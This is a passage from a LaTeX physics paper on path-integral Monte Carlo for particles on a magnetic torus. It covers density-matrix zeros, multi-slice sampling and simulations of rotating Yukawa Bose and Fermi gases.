\rho^\text{PBC}(\mathbf r,\mathbf r';\beta) &= e^{i(n\phi_1+m\phi_2)}\rho^\text{PBC}(\mathbf r,\mathbf r';\beta),\\
t^\ast_{\mathbf r'}(n\mathbf L_1+m\mathbf L_2)
\rho^\text{PBC}(\mathbf r,\mathbf r';\beta)&=e^{-i(n\phi_1+m\phi_2)}\rho^\text{PBC}(\mathbf r,\mathbf r';\beta),
\end{split}
\label{eq:peri}
\end{equation}
which hold for any $\beta$.
In the low-temperature limit, $\beta\to\infty$ ($u\to0$),
the analytic structure of $\rho^\text{PBC}(\mathbf r,\mathbf r';\beta)$ simplifies significantly.
Notice that both for open and periodic boundary conditions the value of the density matrix goes to
zero at any fixed coordinates $\mathbf r$ and $\mathbf r'$.
This is an artifact of the zero-point energy $\frac{\hbar\omega_c}{2}$, and does not appear in averages
as they involve normalization by the partition function $Z(\beta)=\sum_{n=0}^\infty u^{n+1/2}=\frac{\sqrt u}{1-u}$.
We study the analytic structure in the low-temperature limit by factoring out the nonzero factor
$\rho^\text{open}(\mathbf r,\mathbf r';\beta)$ for convenience:
\begin{equation}
\lim_{\beta\to\infty}
\frac{\rho^\text{PBC}(\mathbf r,\mathbf r';\beta)}{\rho^\text{open}(\mathbf r,\mathbf r';\beta)} = f_\infty(z,z'),
\end{equation}
where
\begin{multline}
f_\infty(z,z')=\frac{1}{N_\phi}
\sum_{m=0}^{N_\phi-1}\left\{
\vartheta\begin{bmatrix} 0 \\ a_m \end{bmatrix}\left(\frac{iL_1}{4\ell^2 N_\phi}\left({z'}^\ast-z\right)
\Big|\tilde\tau_1\right)\right.\\
\left.\times
\vartheta\begin{bmatrix} 0 \\ 2b_m' \end{bmatrix}\left(
\frac{N_\phi\pi}{L_1}\left(z+{z'}^\ast\right)
|\tilde\tau_2\right)+\right.\\
\left.+(-1)^k\vartheta\begin{bmatrix} 0 \\ a_m+\frac{1}{2} \end{bmatrix}
\left(\frac{iL_1}{4\ell^2 N_\phi}\left({z'}^\ast-z\right)
\Big|\tilde\tau_1\right)\right.\\
\left.\times\vartheta\begin{bmatrix} \frac{1}{2} \\ 2b_m' \end{bmatrix}
\left(\frac{N_\phi\pi}{L_1}\left(z+{z'}^\ast\right)
|\tilde\tau_2\right)
\right\},
\end{multline}
where
$\tilde\tau_1=\frac{i}{\pi}\left(\frac{L_1}{2\ell N_\phi}\right)^2$
and
$\tilde\tau_2=i\pi\left(\frac{2\ell N_\phi}{L_1}\right)^2$.
$f_\infty(z,z')$ is holomorphic in $z$, and antiholomorphic in $z'$, on the entire complex plane.
Fixing $z'$, the zeros of $f_\infty(z,z')$ can be counted by the argument principle of complex calculus.
Consider the quadruple domain $Q$ with corners $z'+L_1(\pm1\pm\tau)$, c.f.\ Fig.~\ref{fig:domain}(b).
We have
\begin{equation}
\oint_{\partial Q} \frac{d}{dz}\ln\left(f_\infty(z,z')\right) dz=-8\pi iN_\phi,
\end{equation}
which, exploiting the periodicities in Eq.~(\ref{eq:peri}) and the fact that
$\rho^\text{open}(\mathbf r,\mathbf r';\beta)$ is nonzero,
implies that the thermal propagator $\rho^\text{PBC}(\mathbf r,\mathbf r';\beta\to\infty)$
has $N_\phi$ zeros in the principal domain in Fig.~\ref{fig:domain}(a).
At nonzero temperature the analytic structure of $\rho^\text{PBC}(\mathbf r,\mathbf r';\beta)$ is not simple.
Nevertheless, we have found numerically that the number of zeros in the principal domain is the same
at any finite $\beta$, and the zeros very quickly reach their final location.
See Fig.~\ref{zeros} for illustration.
If $N_\phi$ is odd, there are zeros that do not move at all.
For $\phi_1=\phi_2=0$, in particular, one of them is located in the corners of the principal domain
(which are identical by periodicity).
\begin{figure}[htbp]
\begin{center}
\includegraphics[width=\columnwidth]{zeros65crop}
\includegraphics[width=\columnwidth]{zeros50crop}
\end{center}
\caption{\label{zeros}
The low-temperature limit $\beta\to\infty$ of the thermal density matrix.
As no change is discernible beyond $\beta=100$, the density plot has been generated using this value.
(a) $N_\phi=4$ particles, $\theta\approx65^\circ$, $|\mathbf L_2|/|\mathbf L_1|=1.2$, $\phi_1=\phi_2=0$.
In the zoomed area we show how the zeros move to their asymptotic position as a function of
inverse temperature $\beta$.
(b) The same for $N_\phi=5$, $\theta\approx50^\circ$, $|\mathbf L_2|/|\mathbf L_1|=1.25$, $\phi_1=\phi_2=0$.
Note that one of the zeros is fixed at the corner of the principal region,
which is the generic behavior when $N_\phi$ is odd.
}
\end{figure}
Fig.~\ref{zerostruct} shows the structure of zeros for different geometries.
Multiple zeros occur in regular cases, as for the square unit cell in panel (b).
\begin{figure}[htbp]
\begin{center}
\includegraphics[width=0.49\columnwidth]{zerostruc1}
\includegraphics[width=0.49\columnwidth]{zerostruc2}
\includegraphics[width=0.49\columnwidth]{zerostruc3}
\includegraphics[width=0.49\columnwidth]{zerostruc4}
\end{center}
\caption{\label{zerostruct}
The structure of zeros of the thermal density matrix for $\beta\hbar\omega_c=200$,
where the picture is stationary for different geometries and flux quanta.
We show $|\rho^\text{PBC}(\mathbf r,\mathbf r';\beta)|$, the zeros are the darkest spots.
We set $\phi_1=\phi_2=0$ and fix $\mathbf r'$ at the origin.
(a) Generic torus with $N_\phi=6$, $L_2/L_1=1.13$ and $\theta\approx75^\circ$;
(b) Square principal domain ($\theta=90^\circ$, $L_2/L_1=1$) with $N_\phi=7$;
(c) Generic torus with $N_\phi=11$, $L_2/L_1=1.19$ and $\theta\approx72^\circ$;
(d) Hexagonal principal domain ($\theta=60^\circ$, $L_2/L_1=1$) with $N_\phi=12$.
}
\end{figure}
In Fig.~\ref{zeromove} we show the motion of the zeros of the thermal density matrix as we tune the twist angles.
Qualitatively, the motion of the zeros shows an interesting analogy with the Hall current:
tuning $\phi_1$ moves them in the $\mathbf L_2$ direction--the direction of the electromotive force
on a charged particle induced by the change of flux--, and conversely.
As a deeper explanation of the motion of the zeros is not crucial to the present work, we leave
the analysis of this issue an open problem.
\begin{figure*}[htbp]
\begin{center}
\includegraphics[width=0.48\textwidth]{zeromove_x}
\includegraphics[width=0.48\textwidth]{zeromove_y}
\end{center}
\caption{\label{zeromove}(Color online)
The trajectories of the zeros of the thermal density matrix as we tune
(a) the twist angle $\phi_1$ and (b) the twist angle $\phi_2$ between 0 and $2\pi$.
We set $\beta\hbar\omega_c=200$, $\mathbf r'=0$, $N_\phi=2$, $L_2/L_1=1.19$ and $\theta\approx56^\circ$.
The crosses at specific points on the trajectories correspond to multiples of $\pi/5$.
The speed of the zeros is not uniform, as visible from the distance between adjacent labelled points.
}
\end{figure*}
\section{Multi-slice sampling}
\label{multislice}
For noninteracting particles and open boundary conditions, the familiar construction of multi-slice
moves \cite{Pollock84} by the bisection method \cite{Ceperley95}
builds a Brownian bridge $R_{L+1},R_{L+2},\dots,R_{R-1}$ between the fixed configurations $R_L$ and $R_R$
at possibly distant slices $L$ and $R=L+2^l$ (mod $M$) on the path.
The deviation of the high-temperature density matrix used in the simulation from the ideal gas case
can be taken into account either at each or just the last level of this recursive procedure.
At each level of this recursive construction we need to know the PDF
of configuration $R_i$, which is to be inserted between $R_{i-s}$ and $R_{i+s}$
at time distances $\pm s\tau$ on the path.
If the ideal gas density matrix $\rho_0(R,R';\beta)$ is \emph{real}, this is simply
\begin{equation}
p(R_i)=\frac{\rho_0(R_{i-s},R_i;s\tau)\rho_0(R_i,R_{i+s};s\tau)}{\rho_0(R_{i-s},R_{i+s};2s\tau)};
\end{equation}
the convolution property in Eq.~(\ref{eq:conv}) ensures that this is a normalized PDF.
If we can sample $p(R_i)$ directly, we implement the \emph{heat-bath rule} for noninteracting particles.
(In fact, with open boundary conditions and zero external magnetic field, $p(R_i)$ is a Gaussian.)
On the other hand, if the free density matrix $\rho_0(R,R',\tau)$ is \emph{complex},
paths must be sampled from the PDF $\prod_{m=1}^{M}|\rho(R_{m-1},R_m;\tau)|$.
As $|\rho_0(R,R',\tau)|$ does not satisfy a convolution property analogous to Eq.~(\ref{eq:conv}),
\begin{equation}
\widetilde p(R_i)=
\frac{|\rho_0(R_{i-s},R_i;s\tau)||\rho_0(R_i,R_{i+s};s\tau)|}{|\rho_0(R_{i-s},R_{i+s};2s\tau)|}
\end{equation}
is not a normalized PDF.
This is not a problem for single-slice moves, but it plagues the bisection method.
First consider how one could adapt multi-slice moves to periodic boundary conditions in the \textit{absence} of a
magnetic field in one dimension.
The single-particle density matrix is \cite{Ceperley95}
\begin{multline}
\rho^\text{PBC}_0(x,x';\beta)=\frac{1}{L}\vartheta_3\left(
\frac{\pi}{L}(x-x') \Big| \frac{4\pi i\lambda\beta}{L^2}\right)=\\
=\frac{1}{\sqrt{4\pi\lambda\beta}}\sum_{n=-\infty}^\infty
\exp\left(-\frac{(x-x'+nL)^2}{4\lambda\beta}\right),
\end{multline}
where $L$ is the period.
(The second equality involves a modular transformation of the function $\vartheta_3(z|\tau)$).
Optimal sampling could be achieved by the heat-bath rule on slice $m$
\begin{equation*}
T^\ast(x'_m|x_{m-1},x_{m+1})=\frac{\rho^\text{PBC}_0(x_{m-1},x_m;\tau)\rho^\text{PBC}_0(x_m,x_{m+1};\tau)}{\rho^\text{PBC}_0(x_{m-1},x_{m+1};2\tau)}.
\end{equation*}
Sampling $x'_m$ from this PDF results in moves that are always accepted for noninteracting particles.
With straightforward algebra,
\begin{multline}
\label{eq:hbath}
T^\ast(x'_m|x_{m-1},x_{m+1})=\\
=\alpha_0\sum_{k=-\infty}^\infty\exp\left(-
\frac{((x_{m+1}+x_{m-1})/2-x'_m+kL)^2}{2\lambda\tau}\right)+\\
+\alpha_1\sum_{k=-\infty}^\infty\exp\left(-
\frac{((x_{m+1}+x_{m-1}+L)/2-x'_m+kL)^2}{2\lambda\tau}\right),
\end{multline}
where
\begin{multline*}
\alpha_i = \frac{1}{\sqrt{2\pi\lambda\tau}}\frac{
\sum_{k'}\exp\left(-\frac{((x_{m+1}-x_{m-1}+iL)/2+k'L)^2}{2\lambda\tau}\right)}
{\sum_{k'}\exp\left(-\frac{(x_{m+1}-x_{m-1}+k'L)^2}{8\lambda\tau}\right)}.
\end{multline*}
$T^\ast(x'_m|x_{m-1},x_{m+1})$ has a very simple structure: the first term
is a collection of the periodic copies of the Gaussian peak centered at $(x_{m+1}+x_{m-1})/2$,
the second term collects peaks at periodic copies of $(x_{m+1}+x_{m-1}+L)/2$.
This suggests a very simple algorithm: with probability
$p=\alpha_0/(\alpha_0+\alpha_1)$ we sample a Gaussian of variance $\lambda\tau$ at
$(x_{m+1}+x_{m-1})/2$, with probability $1-p$ we sample a similar Gaussian at $(x_{m+1}+x_{m-1}+L)/2$.
(With no loss of generality we can choose any of the equivalent peaks,
and map $x'_m$ back to the interval $(-L/2,L/2)$.)
Further, $T^\ast$ in Eq.~(\ref{eq:hbath}) can be applied on any level of the bisection
method to construct a free-particle trajectory between two slices separated by imaginary time $2^l\tau$.
With interactions present, the deviation of the high-temperature density matrix that defines the PDF of paths
from $\rho^\text{PBC}_0$ could be taken into account by a rejection step on the last level of recursion.
(For alternative approaches to periodicity in zero magnetic field, see Ref.~\onlinecite{Cao94}.)
In the presence of an external magnetic field, the density matrix in Eq.~(\ref{eq:second}) is complex-valued.
We sample paths by the product of the magnitudes of the density matrices that connect
subsequent slices.
Consider moving a bead $z_m$ on slice $m$ with all other beads fixed.
\begin{equation*}
T^\ast(z'_m|z_{m-1},z_{m+1})=\frac{|\rho^\text{PBC}(z_{m-1},z_m;\tau)||\rho^\text{PBC}(z_m,z_{m+1};\tau)|}{|\rho^\text{PBC}(z_{m-1},z_{m+1};2\tau)|}
\end{equation*}
is not a normalized PDF, but this would not impair the Metropolis algorithm.
As in the $\beta\to0$ limit $|\rho^\text{PBC}(z,z';\tau)|$ with fixed $z'$ tends to a system of Gaussian peaks
centered at $z'+nL_1+mL_1\tau$, just like in the nonmagnetic case, we try the following.
We choose the \textit{a priori} sampling PDF $T(z'_m|z_{m-1},z_{m+1})$ as a collection of four Gaussian
peaks centered at
\begin{equation}
\begin{split}
Z^{z_{m-1},z_{m+1}}_0&=(z_{m-1}+z_{m+1})/2,\\
Z^{z_{m-1},z_{m+1}}_1&=(z_{m-1}+z_{m+1}+L_1)/2,\\
Z^{z_{m-1},z_{m+1}}_2&=(z_{m-1}+z_{m+1}+L_1\tau)/2,\\
Z^{z_{m-1},z_{m+1}}_3&=(z_{m-1}+z_{m+1}+L_1(1+\tau))/2.
\end{split}
\end{equation}
The height of these peaks is proportional to
\begin{equation}
\alpha_i=\frac{|\rho^\text{PBC}(z_{m-1},Z_i;\tau)||\rho^\text{PBC}(Z_i,z_{m+1};\tau)|}
{|\rho^\text{PBC}(z_{m-1},z_{m+1};2\tau)|},
\end{equation}
for $0\le i\le 3$.
We choose peak $i$ with probability $p_i=\alpha_i/(\sum_{j=0}^3\alpha_j)$.
We take into account the fact that the diffusive motion described by both
$|\rho^\text{open}(R,R',\tau)|$ and $|\rho^\text{PBC}(R,R',\tau)|$ are different
from the diffusion in the absence of magnetic field.
Thus the sampled Gaussian has variance $\frac{1-u}{1+u}\ell^2$ with $u=e^{-\hbar\omega_c\tau}$.
Notice that $\frac{1-u}{1+u}\ell^2<\lambda\tau$.
As the heat-bath rule is not obeyed, the acceptance probability is less than unity even
for noninteracting particles in single-slice moves:
\begin{multline}
A(z_m\to z'_m) =
\frac{|\rho^\text{PBC}(z_{m-1},z'_m;\tau)||\rho^\text{PBC}(z'_m,z_{m+1};\tau)}{
|\rho^\text{PBC}(z_{m-1},z_m;\tau)||\rho^\text{PBC}(z_m,z_{m+1};\tau)}\\
\times\frac{T(z_m|z_{m-1},z_{m+1})}{T(z'_m|z_{m-1},z_{m+1})}.
\end{multline}
For multi-slice moves, we proceed as follows.
(i) A trial path is constructed recursively between slices $L$ and $R=L+2^l$.
Midway between slices $L$ and $R$, we choose $z'_{(L+R)/2}$
from one of four Gaussian peaks at $Z^{z_{L},z_{R}}_i$ of
variance $\frac{1-u_1}{1+u_1}\ell^2$, where $u_1=e^{-\hbar\omega_c\tau_1}$ and $\tau_1=2^{l-1}\tau$.
Then we sample $z'_{L+2^{l-2}}$ from one of four Gaussian peaks at $Z^{z_{L},z'_{(L+R)/2}}_i$
and $z'_{R-2^{l-2}}$ from one of four Gaussian peaks at $Z^{z'_{(L+R)/2},z_R}_i$,
all having variance $\frac{1-u_2}{1+u_2}\ell^2$, where $u_2=e^{-\hbar\omega_c\tau_2}$ and $\tau_2=2^{l-2}\tau$.
We continue on subsequent levels, until the trial path $z'_{L+1},\dots z'_{R-1}$ is complete.
During this construction, the ratio of the \textit{a priori} sampling PDFs
\begin{equation}
P_1=\frac{T(z_{L+1},\dots z_{R-1}|z_{L},z_{R})}{T(z'_{L+1},\dots z'_{R-1}|z_{L},z_{R})}
\end{equation}
is stored.
(ii) Once the trial path is available, the ratio of the PDF of the new and the old paths is calculated
\begin{equation}
P_2=\frac{\prod_{m=L+1}^{R}|\rho(z'_{m-1},z'_m;\tau)|}{
\prod_{m=L+1}^{R}|\rho(z_{m-1},z_m;\tau)|}
\end{equation}
The constructed trial path is then accepted with probability $A(z\to z')=P_1P_2$.
\begin{figure}[htbp]
\begin{center}
\includegraphics[width=\columnwidth]{stest}
\end{center}
\caption{\label{fig:stest}
Acceptance ratios for sampling the motion of a single particle on a rectangular
torus pierced by $N_\phi=2$ flux quanta.
The inverse temperature of the system is $\beta\hbar\omega_c=2$,
and the number of slices ranged between $M=8$ and 256.
Level $l$ means that $2^l-1$ slices are updated in each multi-slice move.
}
\end{figure}
For testing the efficiency of the above algorithm, in Fig.~\ref{fig:stest} we show
the acceptance ratio for the simplest possible case, the simulation of a single free particle on the torus.
The phase was fixed to the density matrix in Eq.~(\ref{eq:second});
we set $\beta\hbar\omega_c=2$, and there are $N_\phi=2$ flux quanta through a rectangular torus.
(For the computational advantage of choosing $N_\phi$ even, see Appendix \ref{app:comput}.)
For $N$ particles, the acceptance ratio is roughly raised to the $N$-th power;
this is the baseline that interactions are expected to reduce further.
We have checked systematically that the acceptance ratio just weakly depends on the aspect ratio
or the twist angles.
\section{Application: rotating Yukawa gases}
\label{yukawa}
We consider particles that interact by a repulsive modified-Bessel-function interaction.
The system rotates about the $z$-axis with angular velocity $\Omega$.
In the co-rotating frame it is described by the Hamiltonian
\begin{equation}
\label{eq:corot}
\mathcal H=-\frac{\hbar^2}{2m}\sum_{i=1}^N
\left(\nabla_i - \frac{im}{\hbar}\mathbf\Omega\times\mathbf r\right)^2
+\epsilon\sum_{i<j}K_0\left(\frac{r_{ij}}{a}\right),
\end{equation}
where $\epsilon$ and $a$ characterize the strength and the range of the interaction, respectively.
We consider both Bose and spinless Fermi systems.
In cold atomic experiments a confinement potential is also present, which is weakened by the centrifugal
force in the co-rotating frame.
We do not include these terms; we describe a homogeneous portion of the gas.
As apparent from Eq.~(\ref{eq:corot}), the Coriolis force couples to momenta just like
a uniform magnetic field does for charged particles \cite{Wilkin98,Cooper08}.
The quantitative connection is established by the correspondence
\begin{equation}
\omega_c=2\Omega,\qquad\ell=\sqrt{\frac{\hbar}{2m\Omega}}.
\end{equation}
For $\Omega=0$, a mathematically equivalent system arises in type-II superconductors,
where the bosons correspond to Abrikosov vortex lines \cite{Nelson89}.
Both the ground state \cite{Magro93} and the finite temperature \cite{Nordborg97} phase diagram
of this time-reversal invariant system have been explored by quantum Monte Carlo techniques.
There are four energy scales in the problem: the temperature $k_\text{B}T\equiv\beta^{-1}$,
the cyclotron energy $\hbar\omega_c$, the interaction strength $\epsilon$, and
the energy that corresponds to the interaction length scale, $\hbar^2/(2ma^2)$.
We introduce the dimensionless parameters
\begin{equation}
\begin{split}
\beta^\ast = \beta\hbar\omega_c=2\beta\hbar\Omega,\quad\quad
\rho^\ast=\rho a^2,\\
\Lambda=\sqrt{\frac{\hbar^2}{2ma^2\epsilon}},\quad\quad
\kappa=\frac{a}{\ell}=a\sqrt{\frac{2m\Omega}{\hbar}},
\end{split}
\end{equation}
where $\rho$ is the particle density and $\ell$ is the magnetic length.
$\Lambda$ is the de Boer interaction strength parameter.
We could also have used
\begin{equation}
\tilde\beta=\beta\epsilon
\end{equation}
to turn the inverse temperature dimensionless;
the two dimensionless temperature parameters are related as $\tilde\beta=\beta^\ast/(2\kappa^2\Lambda)$.
The dimensionless density can be related to the filling factor $\nu$ of Landau levels as $\rho^\ast=\kappa^2\nu/2\pi$.
With time-reversal symmetry, the system orders in a triangular lattice for strong interaction (small $\Lambda$)
\cite{Magro93,Nordborg97}.
With this prior knowledge, we choose the aspect ratio of the rectangular simulation cell so that it can
accommodate a finite piece of a triangular lattice with periodic boundary conditions.
This means $\sqrt3/2$ for $N=4$, 12 and 16 particles, and $\sqrt3$ for $N=8$ particles.
We emphasize that this choice is the only \textit{a priori} input to our simulation.
The ideal Bose and Fermi gas, respectively, that we use for phase fixing is not ideal
either for a crystal or a correlated liquid.
\begin{figure*}[htbp]
\begin{center}
\includegraphics[width=0.32\textwidth, keepaspectratio]{bosea.eps}
\includegraphics[width=0.32\textwidth, keepaspectratio]{boseb.eps}
\includegraphics[width=0.32\textwidth, keepaspectratio]{bosec.eps}
\vspace*{0.1cm}
\includegraphics[width=0.32\textwidth, keepaspectratio]{bosed.eps}
\includegraphics[width=0.32\textwidth, keepaspectratio]{bosee.eps}
\end{center}
\caption{(Color online)\label{fig:bose}
(a-c) The pair-correlation function for $N=12$ bosons at density $\rho a^2=0.02$ ($\kappa=0.25066$),
at filling factor $\nu=2$ (i.e., $N_\phi=6$ flux quanta piercing the torus) and interaction strength $\Lambda=0.035$,
0.04, and 0.045, respectively.
$M=32$ slices were used, the imaginary time-step is $\tau=0.015625$.
The temperature is low on the scale of interactions, as $\tilde\beta=114$, 99, and 88 in panels (a) to (c).
Panels (d) and (e) show the difference of the pair-correlation functions as $\Lambda$ is changed
from 0.035 to 0.04, and from 0.04 to 0.045, respectively, for systems shown in the top row.
The triangular lattice of dark spots testify the decreasing crystalline correlation as $\Lambda$ is increased.
The small deviations from perfect $C_6$ symmetry in panels (b) and (c)
can be attributed to imperfect thermalization, and could be reduced by longer Monte Carlo runs.
Taking the differences between pair-correlation functions in panels (d) and (e) amplifies these small errors.
}
\end{figure*}
In analogy to free-particle nodes, we fix the phase to the density matrix of the ideal gas,
\begin{equation}
\label{eq:freefermi}
\rho_F(R,R';\beta) = \text{Det}(\rho^\text{PBC}(\mathbf r_i,\mathbf r'_j;\beta))
\end{equation}
for fermions, and
\begin{equation}
\label{eq:freebose}
\rho_B(R,R';\beta) = \text{Perm}(\rho^\text{PBC}(\mathbf r_i,\mathbf r'_j;\beta))
\end{equation}
for bosons; Perm stands for the permanent.
As we will see, such an Ansatz is sufficiently nonrestrictive for reasonable predictions \cite{comment2}.
(Computationally, of course, the Fermi case is easier.)
As phase-fixing for PIMC has already been discussed in the literature \cite{Akkineni08},
we are content with summarizing the technicalities in Appendix \ref{app:pfaction}.
The pair-correlation function for $N=12$ bosons at $\beta^\ast=0.5$ is shown in Fig.~\ref{fig:bose}.
Qualitatively, the transition to the crystalline structure is captured.
Due to computational limitations, however, we cannot simulate more than twelve bosons.
The pair-correlation for a larger Fermi system is shown in Fig.~\ref{fig:fermi}.
The qualitative behavior is similar.
Notice that the small $\beta^\ast$ means that while temperature destroys magnetic effects,
it is still small on the interaction energy scale; $\tilde\beta$ is on the scale of $10^2$.
(In the absence of flux, Ref.~\cite{Nordborg97} finds essentially ground-state behavior at $\tilde\beta\approx300$.)
\begin{figure*}[htbp]
\begin{center}
\includegraphics[width=0.32\textwidth, keepaspectratio]{fermia.eps}
\includegraphics[width=0.32\textwidth, keepaspectratio]{fermib.eps}
\includegraphics[width=0.32\textwidth, keepaspectratio]{fermic.eps}
\vspace*{0.1cm}
\includegraphics[width=0.32\textwidth, keepaspectratio]{fermid.eps}
\includegraphics[width=0.32\textwidth, keepaspectratio]{fermie.eps}
\includegraphics[width=0.32\textwidth, keepaspectratio]{fermif.eps}
\vspace*{0.1cm}
\includegraphics[width=0.32\textwidth, keepaspectratio]{fermig.eps}
\includegraphics[width=0.32\textwidth, keepaspectratio]{fermih.eps}
\includegraphics[width=0.32\textwidth, keepaspectratio]{fermii.eps}
\end{center}
\caption{(Color online)\label{fig:fermi}
\textit{Second row (d-f)}: the pair-correlation function for $N=16$ fermions at density $\rho a^2=0.02$ ($\kappa=0.25066$),
at filling factor $\nu=2$ (i.e., $N_\phi=8$ flux quanta piercing the torus) and interaction strength $\Lambda=0.035$
at inverse temperature $\beta^\ast=0.4$, 0.5, and 0.6, respectively.
In (d) $M=16$ slices were used, $\tau=0.025$ and $\tilde\beta=132$;
in (e) $M=16$, $\tau=0.03125$ and $\tilde\beta=114$;
in (f) $M=24$, $\tau=0.025$ and $\tilde\beta=99$.
Panels (a) and (c) show the difference of the pair-correlation functions between the colder and the warmer system
shown in consecutive panels in the second row.
The triangular lattice of bright spots testify the increasing crystalline correlation as the temperature is decreased.
\textit{Second column (b,e,h)}: the pair-correlation function as the temperature is held fixed at $\beta^\ast=0.5$, but the
de Boer parameter is tuned from $\Lambda=0.03$ in panel (h) to $\Lambda=0.04$ in panel (b).
Panels (g) and (i) show the difference of the pair-correlation functions as $\Lambda$ is changed
from 0.03 to 0.035, and from 0.035 to 0.04, respectively,
for systems shown in the second column.
The triangular lattice of dark spots testify the decreasing crystalline correlation as $\Lambda$ is increased.
}
\end{figure*}
It is customary to characterize the crystalline order by the Lindemann ratio
$\gamma = \sqrt{\frac{1}{N}\sum_{i=1}^N\left\langle (\mathbf r_i - \mathbf R_i)^2\right\rangle}/d$,
where $d$ is the lattice constant and $\mathbf R_i$ is the lattice point nearest to particle $i$.
In our case, however, we cannot hold the center of mass fixed during Monte Carlo, because the
simultaneous shift of all beads by the same vector is not a symmetry,
except for some discrete values, as discussed in Sec.~\ref{sec:freedm}.
One could locate the lattice points with reference to the instantaneous center of mass
assuming the lattice is triangular with the lattice constant implied by the density.
But this procedure underestimates $\gamma$.
Hence, we decided to infer the qualitative behavior from the pair-correlation function instead.
By inspecting the difference of the pair-correlation functions of systems that differ only by one
parameter, we have checked that in the $\beta^\ast<1$ range our method reproduces the
tendencies known for the nonrotating system:
(i) the crystalline tendency becomes stronger with increasing $\beta^\ast$ at fixed $\Lambda$ and $\rho^\ast$,
as seen in the related panels of Figs.~\ref{fig:bose}, \ref{fig:fermi} and \ref{fig:nonmon2}, and
(ii) it becomes stronger when decreasing $\Lambda$ at fixed $\beta^\ast$ and $\rho^\ast$.
Also, Fermi systems show stronger peaks in the pair-correlation than Bose systems at identical temperature,
density, and de Boer parameter $\Lambda$.
It is not possible to go beyond qualitative statements now, as neither finite-size scaling nor a
$\tau\to0$ extrapolation has been performed.
With the prior knowledge that the melting transition is first-order, it will be necessary to
perform simulations with the particle density as dynamical variable \cite{Nordborg97}.
As our goal is to demonstrate the applicability of PIMC to bulk systems in the absence of
time-reversal symmetry, and not an in-depth analysis of the Yukawa system,
we delegate such a quantitative analysis to future work.
\begin{figure}[htbp]
\begin{center}
\includegraphics[width=\columnwidth, keepaspectratio]{fpeak.eps}
\end{center}
\caption{\label{fig:density}(Color online)
The height of the first peak of the pair-correlation function for $N=12$ fermions at $\beta^\ast=0.5$ and
$N_\phi=6$, for various $\Lambda$ de Boer parameter values as the function of density $\rho a^2$.
The nonmonotonic evolution indicates that crystalline order exists only for a
limited range of densities.}
\end{figure}
For $\Omega=0$, Yukawa bosons are known to exhibit nonmonotonic behavior as a function of density:
at fixed interaction strength $\Lambda$ the system first crystallizes with increasing density,
then at sufficiently high density it melts again.
Due to computational limitations, we have only been able to verify this for the Fermi system.
Fig.~\ref{fig:density} shows the evolution of the first peak of the pair-correlation function as the density changes
at fixed $\beta^\ast$ and $\Lambda$ values for fermions.
Apparently, crystalline order prevails only for intermediate densities, just like for bosons
at zero temperature in the absence of rotation \cite{Magro93}.
Determining the phase boundary will require more extensive simulations.
In the $\beta^\ast>1$ range the strength of the crystalline correlations apparently
starts to weaken as a function of the inverse temperature for fermions.
Such an evolution is shown in Fig.~\ref{fig:nonmon2} for various the de Boer interaction
parameters $\Lambda$ as the temperature is tuned from $\beta^\ast=0.1$ to 1.2.
The pair-correlation becomes more crystalline in the $\beta^\ast\lesssim0.6$ range,
then stagnates, and seems to weaken again above $\beta^\ast\approx1$.
Clearly, more comprehensive calculations in the large-$\beta$ region are necessary to ascertain that
this tendency is robust.
If so, it indicates the competition of the homogeneous integer quantum Hall liquid state (the ground state
candidate for this particular density) and the density-wave ordering,
which requires thermal excitations above the cyclotron gap that the interaction can organize in a crystalline order.
This competition is, of course, is not expected for bosons or bolzmannons;
for the latter we have checked the monotonic evolution up to $\beta^\ast=1.8$.
\begin{figure}[htbp]
\begin{center}
\includegraphics[width=\columnwidth, keepaspectratio]{tempfpeak.eps}
\end{center}
\caption{(Color online)\label{fig:nonmon2}
The evolution of the first peak of the pair-correlation function for $N=16$ fermions at flux $N_\phi=8$
at density $\rho a^2=0.02$ ($\kappa=0.25066)$, as a function of the inverse temperature
for some values of the de Boer parameter $\Lambda$ for which crystalline structure is manifest
at intermediate temperatures.
A small horizontal shift has been applied to the last two curves to make the overlapping error bars visible.
}
\end{figure}
It is also interesting to review the evolution of the pair-correlation as a function
of flux density (magnetic field or Coriolis-force) when the particle density $\rho^\ast$ is held fixed.
Again, we could study this only for fermions and bolzmannons; some of the results are shown in Fig.~\ref{fig:flux}.
(Notice that while $\beta^\ast$ is kept constant, the system becomes colder on the interaction
energy scale as $\tilde\beta=\beta^\ast\nu/(4\pi\Lambda\rho^\ast)$ with $\nu=N/N_\phi$;
the ratio of the interaction and the magnetic length scale also changes as $\kappa=\sqrt{2\pi\rho^\ast/\nu}$.)
We see that the system becomes more crystalline as the number of flux quanta is decreased,
which is only possible in very crude steps with $N=16$, the largest system we simulated routinely.
The tendency is qualitatively the same for fermions and bolzmannons, but it is stronger for fermions.
Note that the flux density would localize particles on the scale of the magnetic length,
which is greater than the lattice constant for $\kappa<1$.
On the other hand, it is more difficult to obtain converged results for smaller flux densities,
which is no doubt related to the shortening of the length scale on which the change of the
phase of the many-body wave function can be considered smooth in phase the fixing procedure;
in the limit of vanishing magnetic field, we approach the sudden sign changes that
is treated by node fixing in time-reversal-symmetric simulations.
\begin{figure}[htbp]
\begin{center}
\includegraphics[width=\columnwidth, keepaspectratio]{fluxfermib.eps}
\includegraphics[width=\columnwidth, keepaspectratio]{fluxbolzmannb.eps}
\end{center}
\caption{(Color online)\label{fig:flux}
The difference $g_{N_\phi=2}(\mathbf r)-g_{N_\phi=6}(\mathbf r)$ between pair-correlation functions at
different flux densities (6 and 2 flux quanta through the torus) at $\beta^\ast=0.5$ for $N=16$ and
$\rho a^2=0.02$ for fermions (a) and bolzmannons (b).
The total area of the simulation call is scaled to unity, thus the peak locations may coincide.
(The filling factor corresponding to $N_\phi=6,2$ is $\nu=\frac{8}{3},8$, respectively.)
The triangular lattice of bright peaks correspond to stronger crystalline correlations at smaller flux density.
Bolzmannons in panel (b) are still liquid-like; a small rotation of the hexagonally distorted
rings from directions where crystalline structure will emerge can be attributed to imperfect thermalization.
}
\end{figure}
We note that the PIMC calculations for $N=12$ bosons in Fig.~\ref{fig:bose} required about one day of thermalization
and two days of data collection on a single Intel Xeon X5660 CPU core at 2.8 GHz,
while the calculations for $N=16$ fermions in Fig.~\ref{fig:fermi} were about half that long.
With increasing inverse temperature the number of slices also has to be increased; the most expensive
calculation we performed was for $\beta=1.1$ in Fig.~\ref{fig:nonmon2}, with three days of thermalization and
eleven days of data collection.
The number of flux quanta hardly affects the resources needed: each of the calculations compared in Fig.~\ref{fig:flux}(a)
required about three plus six days; the calculations for distinguishable particles in Fig.~\ref{fig:flux}(b) were about
a factor of three cheaper.
